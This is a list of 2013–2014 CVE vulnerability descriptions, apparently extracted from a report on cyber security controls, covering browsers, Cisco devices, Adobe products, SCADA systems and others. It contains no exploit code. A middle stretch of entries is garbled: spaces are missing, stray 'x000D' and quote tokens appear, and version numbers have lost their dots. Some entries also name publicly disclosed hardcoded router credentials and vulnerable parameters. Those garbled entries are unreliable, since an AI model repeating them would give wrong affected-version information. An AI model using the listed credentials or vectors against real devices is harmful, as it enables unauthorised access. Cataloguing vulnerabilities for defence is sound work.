CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055

CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676

CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389

CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo

CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386

CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors

CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd

CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU

CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect

confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity

CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169

CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function

CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document

CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors

CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors

CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location

CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action

CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject

CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate

CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors

CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897

CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation

CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671

CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341

CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)

CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack

CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28

Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44, DSR-150N with firmware before 1.05B64, DSR-250 and DSR-250N with firmware before 1.08B44, and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

